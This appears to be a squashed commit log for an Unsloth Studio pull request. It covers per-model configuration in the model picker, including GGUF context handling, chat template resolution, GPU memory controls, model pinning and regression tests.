inference support for custom safetensors templates lands in main.
* Fix model picker config edge cases
- Restore prior runtime config when a load no-ops for the active model
- Cap the picker validator request body via the protected prefixes
- Keep the GGUF context slider max above the loaded context
- Fetch subfolder chat templates for uncached Hub repos
- Show the compare side config when reopening the picker
* Keep saved GGUF context above the fallback ceiling
* Show the model config in the run settings sidebar
* Fix model config sidebar reset and context slider
- Stack the remember toggle and action buttons in the sidebar
- Reset the config to defaults instead of the loaded values
- Fetch the native context so the slider max is not the loaded value
* Fix model picker config and download regressions
- Run picker chat template routes off the event loop
- Depth and root guard local template directory scans
- Restore download manager flow for uncached hub picks
- Apply per model context length on reload
- Import model picker symbols from the feature barrel
* Fix model picker config and cached download sorting
- Restore load settings when a Hub run is rejected mid load
- Reuse one NumericValueInput instead of a duplicate copy
- Fix double decode of the model name in the template route
- Remove the unused reset-to-loaded settings action
- Fix cached model download sorting
* Fix model picker per-model config edge cases
Honor a saved or typed max seq length above the model's native context so
RoPE extended values are no longer clamped and silently overwritten. Allow
typing past native while the slider keeps native as a soft ceiling.
Guard the fetch success paths in use-model-defaults against an aborted
signal, and refetch when the HF token changes.
Hash the chat template content in the sidebar remount key instead of its
length. Enable reset for a GGUF whose native context is unknown, and floor
the context slider max so it can never fall below the min.
* Fix GGUF context auto-fit and gated model config token
Stop forcing a 32768 context when a GGUF native context is unknown so the backend auto-fits to VRAM again, while still honoring an explicit context edit.
Send the HF token as a query param so gated safetensors models resolve their max position embeddings.
Derive model default state during render to drop the set-state-in-effect calls.
* Fix native GGUF context ceiling and guard picker template reads
Restore the native context store field so the sidebar slider keeps the
full ceiling for drag and drop GGUFs. Limit local chat template reads to
the browse allowlist, skip malformed repo ids, and drop unused model
picker exports.
* Fix model picker lint boundaries
* Fix model picker review findings
Chat template editor never seeded its draft. Radix only calls onOpenChange
from internal events, so the seed in the nextOpen branch was dead and a model
with a saved override opened empty. Saving then cleared the override. Drop the
dead branch, treat draft as an untouched sentinel, and reset it on every close.
Uncached Hub picks could auto load a model after the user left the chat. Main
detached the staged pick on route exit and on chat context change. Carry the
context key on the pending pick and skip the load when it no longer matches.
Also clear configTarget when the picker closes, restore the onUpdated ref so
variant rows stop resubscribing on every parent render, skip the LRU write when
the entry is already most recent, import NumericValueInput relatively, and drop
the unused ModelUpdateAction barrel export.
* Preserve GGUF context on active reload
* Fix model picker per-model config regressions
- Stop reloading the already loaded model on re-pick
- Hide infra models from the chat picker
- Detect vision support on cached GGUF repos
- Honor saved maxSeqLength on auto load
- Restore default chat template for local GGUFs
- Warn on save failure and revert config on cancel
- Refetch picker inventory on open
- Persist read only per model config safely
* Fix stale model auto load
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* Fix model picker numeric input sizing and constraints
Size value inputs to their content so long context lengths are not clipped,
restrict them to numeric characters, and stop the speculative decoding label
from truncating in the sidebar.
* Fix picker CI tests and harden chat template resolution for PR #6647
- tests: point the descender guard at the moved model-selector.tsx path
- tests: exclude the disabled Reload model button from the regenerate locator so .first targets the real Regenerate
- picker/service.py: reject symlinked template/gguf leaves that resolve outside the browse allowlist (HF cache reads unchanged)
- compare mode: resolve each pane's own remembered chat template instead of inheriting the other pane's from the store
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* Protect future-schema per-model configs from deletion for PR #6647
savePerModelConfig already refuses to overwrite a stored config whose schema version is newer than this client understands, but deletePerModelConfig did not. Unchecking Remember on an older client therefore silently destroyed a newer client's saved config. Apply the same guard on delete and surface the blocked case through the existing saveFailed toast.
* Protect future-schema per-model configs from quota eviction for PR #6647
The save and delete guards already refuse to touch a stored config whose schema version is newer than this client understands, but the quota-eviction path did not, so a full store on an older client could still evict a newer client's config. Skip future-schema entries when evicting and fail the save if the budget cannot be met without them.
* Fix GGUF context persistence, compare context, and rollback settings for PR #6647
Persist a GGUF context override from the user's intent instead of collapsing it against the loaded context, which reintroduced the context-reset (f4838782cb reverted the native-baseline fix). model-config-page now collapses the saved value against native, and use-chat-model-runtime and chat-adapter retain the requested context on load so re-saving another setting keeps the override; a null request stays null so a VRAM auto-fit never becomes a stored override.
shared-composer: a compare pane with no explicit GGUF context now loads at native (0) like single-view, not the session maxSeqLength that silently shrank the shown context.
use-chat-model-runtime: restore the previous model's KV cache dtype and chat template on a failed-load rollback so it runs as it was, not with backend defaults.
* Preserve native path token when reloading the active model for PR #6647
handleReloadActiveModel rebuilt the selection without the store's activeNativePathToken, so reloading a file-picked GGUF after a settings change validated the display label as a repo/path and failed. Thread the active native token through the reload selection so native-loaded models reopen correctly.
* Make picker template validation resilient and accept HF generation tags for PR #6647
Import Jinja lazily inside validate_chat_template so a backend without the optional jinja2 package (GGUF-only installs) still starts instead of raising ModuleNotFoundError at import time. Register a no-op extension for the Transformers {% generation %} assistant-mask tag so pasting a valid HF chat template validates, matching the renderer, rather than being rejected as an unknown tag.
* Honor remembered compare config and parse processor chat_template.json for PR #6647
* Fix failed-load rollback context and processor template map fallback for PR #6647
* Restore speculative decoding config on failed-switch rollback
When a model switch fails after the previous model was unloaded, the
rollback reload restored tensor_parallel, KV cache dtype and the chat
template override, but omitted speculative_type and spec_draft_n_max and
cleared their loaded shadows to null. The previous model therefore came
back running at backend defaults (speculation off) while the UI still
showed it enabled, and the status resync confirmed the off state. Resend
the previous model's speculative settings in the rollback load and keep
the store's active and loaded speculative fields in sync with them.
* Reset max sequence length when a model has no saved config
applyPerModelConfigToRuntime reset every per-model field except
maxSeqLength, which it only wrote when the incoming config had one.
maxSeqLength is the sole field carried on store.params, so selecting a
model with no remembered config left the previous model's value in place
and later loaded the new model at that leaked length. Fall back to the
standing default so an unremembered model loads at its own default.
* Surface a message when a variant update cannot start
startManagedUpdate handled the conflict and error start outcomes but let
busy fall through as if the update began, so the confirm dialog closed
with no job created and the cached variant stayed stale. Show an info
message when the repo is busy with a sibling transfer so the click is
not silently dropped.
* Keep per-model speculative choices out of the global default
A staged load with a per-model or one-off config sets keepSpeculative,
which already skips reading the global speculative preference. The
matching save still ran unconditionally, so the model-specific choice was
written to the global unsloth_chat_speculative_type and a later model with
no saved config started from it instead of Auto. Skip saveSpeculativeType
when keepSpeculative so the per-model choice stays isolated.
* Seed non-active model settings from the app default max length
The Run settings page captured initialMaxSeqLength from the loaded
model's runtime params and fell back to it for a model with no saved
config. Opening settings for a different, unloaded model and clicking
Load then sent the active model's context (for example 64k) instead of
the 4096 default, risking validation failures or OOMs. Seed the default
for non-active models and keep the runtime value only for the active one.
* Prefer sidecar tokenizer chat template over the GGUF copy for variants
_chat_template_from_dir returned the embedded GGUF template first when a
variant was selected, reversing the tokenizer-first precedence of the
no-variant path. A model whose chat_template.jinja or tokenizer_config.json
supersedes a stale embedded template then got the wrong template on
variant selection. Keep tokenizer files first regardless of variant; the
variant only picks which GGUF is the fallback. Adds regression tests for
both the tokenizer-wins and gguf-fallback cases.
* Keep per-model speculative choices load-local in autoload and compare
The interactive load path treats a per-model speculative choice as
load-local and skips writing it to the global default. Autoload and
generalized compare still called saveSpeculativeType unconditionally, so a
remembered off or ngram setting leaked into unsloth_chat_speculative_type
and later models with no saved config inherited it. Persist the global
preference only when the value came from the global settings.
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* Studio: record the compare pane's loaded context in runtime state so the active model's settings and any reload or save use it, not the previous context
* Studio: notify the user when a Hub autoload can't start because another download for the model is already running, instead of silently dropping it
* Studio: drop the merge's orphaned staged-model store helpers and unused alert imports
The main merge left isPendingGguf and pendingSelectionMatches referencing the
removed PendingModelSelection type, and the alert-dialog/alert imports unused
after the permission-mode dropdown replaced the bypass dialog, so tsc -b failed.
* Studio: cache a null default chat template so the viewer stops re-fetching it
A model with no sidecar or embedded template resolves to a terminal null, but
that result was never cached, so reopening the template viewer re-ran the
backend and Hugging Face lookup every time.
* Studio: detect direct-file GGUFs in run settings so Max Tokens uses their context
A GGUF loaded from a local file or custom folder has no variant label, so the
run-settings panel treated it as non-GGUF and clamped Max Tokens to the session
max_seq_length instead of the loaded GGUF context. Detect it via the reported
GGUF context and the .gguf checkpoint suffix, matching the chat page.
* Studio: prompt to re-select a local model file when its lease expired before reload
A file-picked GGUF is reachable only through a native path token that the
desktop host prunes after a TTL. Reloading reused that token blindly, so a
reload long after the initial load failed with an opaque error. Track the
token's expiry and, when it has passed, ask the user to re-select the file
instead of attempting a doomed reload.
* Fix descender-clipping test to tolerate sidebar layout utilities
The sidebar account-block div carries layout utilities (min-w-0, flex-1)
between 'flex' and 'flex-col', so the descender-clipping guard's regex,
which required 'flex' immediately followed by 'flex-col', no longer matched
and the test failed to locate the account-block div. Generalize the prefix
to allow intervening flex utilities while still capturing the leading-*
class before the collapsible visibility utility and asserting leading-tight,
so the guard against clipped glyph descenders is fully preserved.
* Harden picker chat-template resolution
Enforce the 64 KiB chat-template contract at the validate endpoint's request
model so a direct caller cannot submit a template far larger than the frontend
allows (MaxBodyMiddleware only bounds the whole request body, not this field);
oversized templates now return a clean 422.
Apply sidecar-over-GGUF template precedence globally across cached snapshots
instead of per snapshot. A repo with multiple cached revisions previously
returned the first snapshot's template, so a newer GGUF-only revision could
win over an older revision's maintained chat_template.jinja sidecar, which
contradicted the documented intent that sidecars supersede the embedded copy.
* Guard per-model config against future-schema and lossy migration
Two forward-compatibility gaps in the versioned per-model config store:
- The load/apply path returned and normalized a stored record without checking
its schema version, so a record written by a newer client was reinterpreted
under the current schema and applied to a live model load, even though save,
delete and eviction all refuse to touch future-schema records. Reject
future-schema records on load too.
- The one-time legacy migration enforced the storage budget without protecting
the entries it had just migrated and set the completion flag unconditionally.
When storage was already full of future-schema records (which are unevictable
by an older client), the migrated entries were the only evictable ones and
could be dropped while migration was still marked complete. Protect the
migrated keys during eviction and only mark migration complete when they
survive, so it retries once space frees up.
* Discard chat-template validation results after the dialog closes
Server-side template validation is async, but closing or cancelling the editor
did not abort it, so a late-arriving valid response still called onSave and
applied a template the user had already dismissed. Track a validation token
that is bumped on close and ignore any validation result whose token is stale.
* Record native lease expiry when loading a picked GGUF from the chip
The pending-native-model chip loaded via stageOrLoad directly, bypassing
loadNativeModelIntent, so activeNativePathExpiresAtMs was never recorded for a
chip-loaded file. A later reload then either skipped the lease-expiry guard
entirely (expiry left null) or compared against a previously loaded file's
stale expiry, so reload could reuse an already-pruned token or wrongly block a
still-valid one. Route the chip through loadNativeModelIntent, which builds the
same selection and records the expiry.
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* Prefer sidecar template for a directly selected local GGUF file
A direct .gguf file path read its embedded chat template without checking the
parent directory for a maintained sidecar (chat_template.jinja /
tokenizer_config.json), while directory and variant selections already prefer
the sidecar. That let the config editor preview or save a stale embedded
template for the same model depending on how it was selected. Check the parent
directory sidecars first, then fall back to the embedded copy, and cover both
paths with tests.
* Resolve cached chat template per revision, newest first
The earlier change searched every cached snapshot for a sidecar before
considering any snapshot's embedded GGUF template, which let an obsolete sidecar
from an older revision override the newest revision's template. Restore
per-snapshot resolution (newest first): a revision's sidecar still supersedes
its own embedded GGUF copy, but a newer revision is no longer overridden by an
older revision's sidecar.
* Preserve autoload transport conflicts and surface background busy downloads
- When a Hub autoload hits a transport conflict, keep pendingHubAutoLoad bound
instead of clearing it. Clearing it re-keyed the download surface and its
cleanup cancelled the conflict the toast tells the user to resolve, so the
Hub resume affordance was gone the moment it appeared. Return early on
conflict, mirroring the started branch, so resolving it from the Hub still
auto-loads on completion.
- The background-download branch handled started and conflict but silently
dropped a busy outcome, leaving the user with no feedback when a peer variant
of the same repo was already downloading. Surface the same busy toast the
autoload path uses.
* Fix context length, GGUF template, fetch state and lease expiry bugs
Keep explicit context length values instead of collapsing to null at
native. The collapse made the slider jump back at the native maximum
and made Reload load the previous context instead of the chosen one.
Prefer the first split when resolving a GGUF without a variant. Later
splits carry no chat template metadata, so picking the largest file
could return no template for a sharded model.
Clear stale fetch state when template and metadata lookups retry, so
a previous terminal error is not shown while a new fetch is running.
Record native path lease expiry together with the token when a load
commits. The expiry was written by only one load path and even when
the load did not start, so a reload could be blocked with an expired
file message for a still valid token.
* fix(model-picker): resolve review findings across config, inventory, and templates
- Apply remembered per-model config in the training-compare chat handoff so a
prior model's customContextLength no longer leaks into the next load
- Match GGUF variant labels with the inventory extractor too, so cached
no-quant-token files resolve their default chat template
- Show "Auto" instead of a fabricated 32768 when native context is unknown
- Reuse the identical staged auto-load object on same-pick so a re-pick during
download pre-flight no longer disarms auto-load via "busy"
- Union supports_vision when deduping cross-cache inventory rows
- Serve hidden-model needles from a new GET /api/hub/hidden-models endpoint and
merge them client-side, covering runtime-configured RAG embedders
- Clamp GET chat templates to MAX_CHAT_TEMPLATE_BYTES (route + jinja sidecar),
matching the validate endpoint's contract
- Lower-clamp stored customContextLength to shared CONTEXT_LENGTH_MIN
- Wipe unsloth_chat_load_on_selection in Settings "Reset all"
- Drop stale pendingHasContext comment describing deleted staging machinery
* Fix stale defaults cache, token in query string and rounded up context ceiling
Refresh cached chat template and max position data when a model update
completes. Send the HF token for model config requests in the dedicated
header instead of the URL. Snap the native sequence length ceiling down
to the nearest step so the slider cannot exceed the declared maximum.
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* Fix compare pane reverting active checkpoint on non-GGUF load
Re-read runtime params after setCheckpoint so the fresh checkpoint is
kept instead of being overwritten by the pre-setCheckpoint snapshot.
* Send the HF token via header for the vision and embedding checks
checkVisionModel and checkEmbeddingModel still passed the HuggingFace
token as a ?hf_token= query parameter, so it landed in server access
logs, proxy logs, and browser history. Move them to the
X-Unsloth-HF-Token header like getModelConfig already does, and accept
the header on the check-vision and check-embedding routes with the
existing query parameter kept as a fallback for older clients.
* Cap the chat template on the model load path
The load endpoint accepted an unbounded chat_template_override, so a
direct caller could hand llama.cpp an arbitrarily large Jinja template
even though the frontend, the validate endpoint, and the read paths all
enforce the 64 KiB limit. Reuse MAX_CHAT_TEMPLATE_BYTES in the
LoadRequest validator, rejecting oversized templates with a fast
character-count check before the exact UTF-8 byte check.
* Protect existing per-model configs during legacy migration
When the one-time legacy import pushes the store over budget, eviction
now protects the entries the user already has and drops only the
just-migrated legacy entries, so importing old load settings can never
discard a newer per-model config.
* Reset clears the context override instead of pinning the native value
Reset wrote the discovered native context into customContextLength for
GGUF models, but isDefaultConfig treats any non-null customContextLength
as an explicit pin, so Reset with Remember enabled persisted a fixed
context and future loads stopped using the native auto context. Reset
now restores the full default (customContextLength null); the native
value is still shown through the existing display fallback.
* Bound chat-template sidecar reads to a size limit
The chat_template.json, tokenizer_config.json, and Hub-downloaded sidecar
readers decoded and json-parsed the whole file before the extracted
template hit the 64 KiB response cap, so an oversized metadata file could
exhaust memory. Read them through a bounded reader (4 MiB envelope) that
returns None when the file is larger, matching the existing chat_template.jinja
size guard. Adds tests for oversized tokenizer_config.json and chat_template.json.
* Keep the native-path token and lease expiry in sync
Rollback after a failed reload restored the previous token but left the
failed load's expiry in the store, so a later reload could be falsely
blocked as expired (token A paired with load B's lease). Restore the
previous lease alongside the token, and clear the expiry wherever the
token is cleared on a non-GGUF transition, so the two never diverge.
* Clear the native file lease on compare-pane loads
* Studio: add regression tests for the model-picker per-model-config
Guard the specific regressions that reverted the predecessor change:
- backend pytest (studio/backend/tests/test_model_picker_regression.py):
infra-model hiding, HF token via header with query fallback, and the
chat-template byte caps.
- source contracts (tests/studio/test_model_picker_contracts.py): the token
stays out of the URL, the context ceiling is floored, the native lease is
cleared on compare-load and restored on rollback, the default caches key on
the inventory version, and the hidden needles stay present.
- Playwright E2E (tests/studio/playwright_model_config.py) wired into
studio-ui-smoke.yml on port 18898: Context Length persists across a reload,
Reset clears the stored override, and infra models are absent from the picker.
- optional GPU-gated inference smoke (tests/studio/test_gpu_inference_smoke.py)
that auto-skips on GPU-less CI and stays short on a GPU.
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* Studio: model pinning, row menus, hub inference settings, and inventory filters
Pinning
- Add a pinned models store (localStorage) with repo and per-quant pins
- Pinned section in the model selector's On Device list and the hub inventory,
with newest pins first so Pin to top lands on top
- Deleting a repo drops its pins
Row menus
- Replace loose row icons with a shared 3-dots menu (pin, reveal in file
manager, copy identifier, copy path, delete) on picker rows, hub quant rows,
the hub run bar, and on-device inventory rows
- Menus only render for models actually on disk; platform-aware reveal labels
- Backend: cached-model-path and reveal-cached-model endpoints resolving
managed HF-cache repos only
Hub inference settings
- Gear in the GGUF run bar opens an Inference settings dialog reusing the chat
page's controls: model config (context length, KV cache, speculative
decoding, chat template), system prompt, reasoning, sampling, tools and
retrieval
Inventory
- Model-type filter (text, vision, embedding, STT, TTS, diffusion) beside the
sort pill, both with a sort icon, capped widths and truncation so the
On device heading never wraps
- Unsloth-owned repos without an upstream provider logo fall back to the
Unsloth mascot avatar
- Discover / On Device tabs widened; hub search bar narrowed to match
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* Studio: revert the Unsloth mascot avatar fallback
Unsloth-owned repos without an upstream provider match go back to the
colored-initial tile, and unslothai is no longer a relabeled owner.
* Studio: run-bar options on single models, and aligned type/capability filters
- Give single-model (non-GGUF) run bars the same 3-dots options menu and
settings gear as GGUF, at repo level
- Drop Pin to top from the run-bar menus; pinning stays in the On Device list
- Add an Image to text (diffusion) capability with detection, and surface it
in both the hub Discover capability filter and the On Device type filter
- Align the On Device type filter with the Discover capability options and
share the same detection so both dropdowns match
* Studio: apply hub inference config on reload, eject action, and run-bar polish
- Fix inference settings not applying: the hub dialog now writes the config to
the runtime before reload, matching the chat page (selectModel reads runtime
state, not the selection)
- Order the settings gear before the 3-dots menu in the run bars
- Replace the loaded-model run-bar action (New Chat) with Eject, wired through
the inspector to the hub's ejectModel
- Truncate the results heading so a long search query clips instead of
overlapping the header pills in split view
- Use a plain magnifying-glass icon for the no-results empty state
* Studio: fix GPU settings loss, load guards, pins, filters, and cached paths
Reloading a model from the chat sidebar or the hub gear dialog rebuilt the
per-model config without the GPU memory fields, so manual GPU layers, MoE
placement, and the GPU pick were reset on every reload and could be saved
over a remembered config. The active config now comes from a shared
useActiveModelConfig hook that carries the GPU fields for GGUF models, and
the sidebar remount signature tracks them through a shared gpuFieldsSignature
helper.
The in-flight load guard lived in a ref inside each useChatModelRuntime
instance, so the chat page, hub page, and gear dialog could not see each
other's loads. A load started from the gear dialog left the hub page free to
eject the model mid-reload or start a second concurrent load. The runtime
store now records the loading pick, selectModel checks it across instances,
and ejectModel refuses with a toast while any load is in flight.
The cached-model-path endpoint matched GGUF files by basename and excluded
only mmproj, so Copy path and Reveal could return an MTP drafter for a quant
and returned 404 for directory layouts like BF16/model-00001.gguf. Variant
files are now resolved from snapshot-relative paths with the same drafter,
mmproj, and big-endian exclusions as the load path, shared through a new
_main_variant_gguf_label helper.
Hub and picker fixes:
- rename the diffusion capability label from "Image to text" to
"Image generation", since it detects image generators
- validate pinned quants through the cached variant listing, keep the last
verified set while revalidating, and drop deleted quants immediately
- pass a measured scroll margin to the on-device virtual list so rows past
the overscan stay visible below the pinned block
- keep the delete menu for stopped partial safetensors downloads
- give the inventory type filter a reset in Clear filters, a truthful empty
state with a Show all types action, and hide it on the datasets view
- order picker pinned rows by pin recency, include pinned matches in the
empty-state check, and sync pins across browser tabs
- count only the visible rows in the On device list header
Tests: contract checks for each fix in test_model_picker_contracts.py and a
backend test for the variant label selection.
* Studio: reveal cached models in Windows Explorer under WSL
The reveal endpoint only branched on macOS, Windows, and generic Linux.
Under WSL the Linux branch spawned xdg-open, which is missing on a stock
distro without a Linux desktop, so the request failed with a 500 and the
UI showed a failed to open file manager error.
WSL is now detected with the existing helper and the path is converted
with wslpath before opening explorer.exe, selecting the file the same
way native Windows does. Directories open directly. When interop is
unavailable the old xdg-open fallback still runs. The macOS, native
Windows, and native Linux branches are unchanged, and the Tauri app is
covered since its hub reveal calls this same local endpoint.
Tests: platform guards for the WSL reveal, the interop fallback, and
the unchanged native Linux behavior in tests/studio/test_reveal_file_manager.py.
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* Adjust model picker row spacing and cogwheel hover consistency
* Studio: exact hidden model ids and newest revision cached paths
A custom RAG embedder repo was published to the frontend as a basename
substring needle, so a generic name like org/model could hide unrelated
models in the pickers. The hidden-models endpoint now sends full repo ids
that are matched exactly.
Copy path and Reveal picked a GGUF variant from an arbitrary cache
revision when the same file existed in more than one. The newest revision
now wins, matching the whole repo lookup.
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* Fix model picker GPU config, metadata, and cache selection
Load each compare model with its saved GPU memory mode, GPU layers, CPU MoE layers, and selected GPU IDs. Reconcile saved GPU IDs with the current hardware. Include the active native GGUF path token in metadata checks. Search all Hugging Face cache roots when resolving cached models and select the largest visible cache entry. Remove obsolete barrel exports and the staging-only GPU memory helper.
* Studio: hide hub inference settings gear for now
The cogwheel in the hub download cards is out of scope for this PR. The
dialog component stays in place and a TODO marks where the button
returns in a future PR.
* Refresh hidden model matchers
* Fix GGUF detection, compare context pin, and picker delete staleness
Treat any pick with a GGUF variant as GGUF in selectModel so the first
load after downloading an uncached quant validates and sizes with the
right GPU settings instead of unloading the current model on a wrong
preflight. Variant picks now also set isGguf on their selection meta.
Stop compare panes from inheriting the active model's context pin when
their own saved config says Auto. Null context in a remembered config
now means no pin, matching how the pane settings are shown.
Route picker deletes through the hub inventory client, which
invalidates the HF cache scan and the variants cache. The legacy
delete route left the scan cache warm, so deleted models reappeared
in the picker until the TTL expired. Removed the now unused legacy
delete client and updated the contract test to match.
* Studio: fix stale GGUF load-marker ordering test
The load-in-flight marker still precedes the hub-download guard and the
unload, but the llama_extra_args inheritance that used to sit between the
marker and the guard now runs ahead of the GGUF branch, so it is no
longer a landmark inside the sliced source. Drop it from the ordering
assertion and keep the marker -> guard -> unload invariant.
* Studio: fix per-model config edge cases in compare loads and saved defaults
- chat-settings-sheet: gate the MTP fallback note and context/VRAM warning on
the broader isGguf (variant, loaded gguf context, or .gguf suffix) instead of
isLoadedGguf, so direct-file and custom-folder GGUF loads still surface
those diagnostics.
- shared-composer: a compare pane's context now comes from its own config only
(a saved pin, else null for Auto/native). It no longer inherits the active
model's shared snapshot, which resolveFitMaxSeqLength treated as an explicit
pin and could load a pane at another model's context (VRAM/OOM), matching the
single-model load path.
- model-config-page: when an auto-fit GGUF is saved with fixed GPU layers
(Manual) and Remember, pin the displayed fitted context so a later fresh load
keeps the placement instead of sending native/0 and recreating the OOM.
- per-model-config: treat Auto GPU memory mode and Auto/default speculative type
as follow-global defaults; do not persist them as per-model overrides so later
global preference changes keep applying.
* Studio: gate vision capability on GGUF projectors and bound remote template downloads
- cache_inventory: only mark a cached repo vision-capable when it holds an actual
GGUF mmproj projector, not any file whose name merely contains "mmproj" (e.g.
mmproj_config.json), matching the runtime's GGUF-only projector detection.
- picker/service: pre-check the remote file size before downloading an uncached
repo's chat template / tokenizer config, so a maliciously large sidecar is
skipped instead of fetched and retained in full, mirroring the size gate the
local-file path already applies.
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* Studio: add source-contract guards for the per-model-config edge-case fixes
Guard the four per-model-config fixes against silent regression in CI:
- local GGUF diagnostics gate on the broad isGguf, not the variant-only isLoadedGguf
- fixed-layer GGUF saves pin the displayed context
- Auto GPU mode and Auto/default speculative are not persisted as per-model overrides
- a compare pane's context comes from its own config, not the active model's snapshot
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* Studio: clear manual GPU knobs on Default and resolve local embedders before repo-id
- model-config-page: switching GPU Memory back to Default now clears the Manual-only
knobs (gpuLayers/nCpuMoe/selectedGpuIds); otherwise a remembered config kept stale
pins that a later load re-applied when the global GPU preference was Manual, despite
the page showing Default.
- routes/models hidden_model_matchers: resolve an existing local path before the repo-id
regex, mirroring is_hidden_model, so a local embedder shaped like "models/embedder" is
hidden by exact path instead of leaking as a chat model.
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* Studio: add _is_mtp_drafter to the model_config stub in the export-paths test
routes/models.py imports _is_mtp_drafter from utils.models.model_config at module
load, but the lightweight stub in test_export_absolute_paths.py did not provide it,
so loading the module under the stub raised ImportError on Backend CI. Add the stub.
* Studio: read a picked GGUF's chat template through the native path lease
The picker chat-template GET has no native-path-lease plumbing, so a
desktop-picked (drag-drop) GGUF could not show its default chat template
in Run Settings until the model was loaded: the endpoint only receives
the display label, not the leased file path.
Read the embedded template through the existing lease-aware
/api/inference/validate probe instead. A new include_chat_template flag
resolves the granted canonical path and returns the GGUF's own embedded
template, never a sibling sidecar (the grant authorizes just that one
file); it skips the training guard like include_context_length and is
bounded by MAX_CHAT_TEMPLATE_BYTES. The frontend fetch mints a one-shot
validate-model lease when a native token is present and keeps the plain
GET path for HF and allowlisted local models.
Adds backend and source-contract regression tests.
* Studio: call worker.direct_wheel_url in the ROCm wheel-url test
The ROCm Mamba/SSM test referenced worker.py's private _direct_wheel_url,
but the worker imports the wheel helper under its public name
direct_wheel_url (utils.wheel_utils). When the worker module loads (its
imports resolve in CI), worker_mod._direct_wheel_url raised AttributeError;
the test only masked it by skipping when the worker could not be imported.
Call the name that actually exists so the assertion runs; it still returns
None for an empty cuda_major (ROCm).
* Studio: reset max sequence length to the app default, not the loaded value
For a non-GGUF active model, the per-model config seeds maxSeqLength from
the loaded runtime value so the panel opens showing the running context.
Reset set config.maxSeqLength to null, but the null fallback resolved back
to that captured runtime value, so the field kept showing the old custom
length and the config saved/reloaded it again. A remembered or active
max-length override therefore could not be cleared from Run settings.
Fall the null/default case back to the app default (clamped to the model's
native ceiling) instead of the active runtime snapshot, so Reset actually
clears the override. The initial view is unaffected: an active model's
config.maxSeqLength is already non-null, so it still shows the loaded value.
Adds a source-contract regression guard.
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* Studio: persist default max length, refresh deleted quants, hide non-chat locals
Three follow-up fixes from review of the per-model-config picker:
- Max sequence length: the persisted per-model record now keeps config's
maxSeqLength (null after Reset) so isDefaultConfig can clear a remembered
override; the resolved app-default is substituted only into the load
request, never the saved record. Previously Reset saved the concrete
default and left the model pinned/remembered.
- GGUF variant expander: deleting a downloaded quant from a repo that still
has other cached quants now bumps the expander refresh key, so the removed
quant stops showing as downloaded and clickable (which would try to reload
the deleted file) until the repo is collapsed and reopened.
- Local picker rows: require capabilities.canChat before listing a local
models-folder / LM Studio row. A weightless folder (only config.json) is
classified non-chat, and toLocalModelInfo drops capabilities, so selecting
such a row would try to load a path the inventory already marked non-chat.
Adds source-contract regression guards for all three.
* Fix compare-pane and Reset context defaults in model picker
Two related per-model-config default regressions:
- A non-GGUF compare pane with no saved maxSeqLength fell back to the
active model's shared runtime snapshot, so comparing a saved 128K model
against an unconfigured pane loaded the latter at 128K and could OOM. It
now falls back to the shared app default (DEFAULT_MAX_SEQ_LENGTH), the
same fallback the single-model config path uses.
- contextAtDefault treated an explicit customContextLength equal to the
native ceiling as a default, which wedged the Reset button disabled for
a deliberate pin-to-native. It now counts as default only when there is
no override at all.
DEFAULT_MAX_SEQ_LENGTH becomes a single exported constant in
per-model-config.ts so the single-model config and the compare path share
one source of truth. Adds source-contract guards for both fixes.
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* Skip over-cap remote Jinja templates so the tokenizer template wins
The remote chat-template resolver bounded raw chat_template.jinja downloads
only by MAX_TEMPLATE_METADATA_BYTES (4 MiB), then returned the first
non-empty Jinja unconditionally. The picker route drops any template larger
than MAX_CHAT_TEMPLATE_BYTES (64 KiB), so an uncached repo whose
chat_template.jinja sits between 64 KiB and 4 MiB returned no template at
all, even when a valid smaller tokenizer_config.json template existed. The
local path already skips oversized .jinja files and falls through.
Gate the extracted Jinja on MAX_CHAT_TEMPLATE_BYTES and continue searching
when it exceeds the cap, matching _chat_template_from_jinja_file. The 4 MiB
download bound stays for JSON files that merely embed a small template. Adds
a regression test that a big Jinja plus a valid tokenizer config resolves to
the tokenizer template.
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* Guard legacy per-model-config migration idempotency
The v1->v2 localStorage migration (unsloth_load_settings ->
unsloth_model_configs) runs on every store read, so it must migrate exactly
once and never re-run, duplicate, or clobber a newer per-model config on a
reload or restart. That was covered only by a manual proof, so add durable
guards:
- Source-contract test pinning the three idempotency layers (the in-memory
legacyMigrationChecked guard, the persistent unsloth_model_configs_migrated
flag set in every terminal branch, and the non-overwriting Object.hasOwn
merge-skip) plus the readMap invocation. Reddens if any layer is dropped.
- Playwright model-config E2E: promote the legacy-migration step to a gating
check (soft_fail, which gates under the CI STUDIO_UI_STRICT=1) that the
migrated value is preserved and the flag is set, then reload again with a
fresh legacy seed present and assert the stored key set is unchanged, so a
second reload cannot re-migrate, duplicate, or clobber.
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* Studio: GPU memory dropdown — llama.cpp --fit on and manual gpu-layers/cpu-moe
* Studio: simplify GPU memory changes (reuse ParamSlider, GPU_LAYERS_ALL, loadedGpuMemoryFields helper)
* Studio: GPU picker — choose which GPUs a GGUF model loads on (gpu_ids)
* Studio: simplify GPU picker (share /api/system fetch, validate gpu_ids)
* Studio: GPU picker review fixes (gate relative indices, no cross-model leak, validate, types)
* Studio: group GPU controls under a collapsible GPU section
* Studio: GPU feature review fixes (fix fit-ctx test, behavior-test the floor, comment accuracy)
* Studio: make GPU a top-level settings section (not nested under Model)
* Studio: flatten GPU controls into the Model section, group by GPU/context/generation
* Studio: move GPU Memory to the bottom of Model with its dependent controls beneath it
* Studio: move GPU Memory below Tensor Parallelism and GPUs below GPU Memory
* Studio: tighten GPU Memory and GPU Layers tooltip copy
* Studio: fix fit-mode context slider track-click, restore GPU Memory tooltip, shorten fit dropdown label
* Studio: GPU Memory tooltip one mode per line, briefer
* Studio: note HIP_VISIBLE_DEVICES (ROCm) in the GPUs picker tooltip
* Studio: narrow the GPU Memory dropdown to fit the shortened label
* Studio: use 'llama.cpp --fit' in the GPU Memory tooltip for consistency
* Studio: allow Tensor Parallelism in Manual GPU mode
* Studio: graduated MoE-on-CPU offload (--n-cpu-moe) replacing the all-or-nothing toggle
* Studio: size the MoE-offload slider for staged (deferred-load) models
* Studio: share one GGUF header walk for the context-length and MoE-count readers
* Studio: size the GPU Layers slider for staged models (one staged-header read)
* Studio: move Tensor Parallelism below the GPUs picker
* Studio: GPU split (--tensor-split) per-GPU model share in Manual mode
* Studio: tolerate whitespace in GPU split input, move it below GPU Layers
* Studio: rename the GPU split control to "Split ratio"
* Studio: Split ratio sends explicit even input; fix blank=free-VRAM (not even) copy
* Studio: tighten llama.cpp --fit VRAM margin with --fit-target 512
* Studio: GPU memory review fixes (rollback re-baseline, single-GPU TP gate, accurate copy)
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* Studio: move Split ratio below MoE Layers on CPU
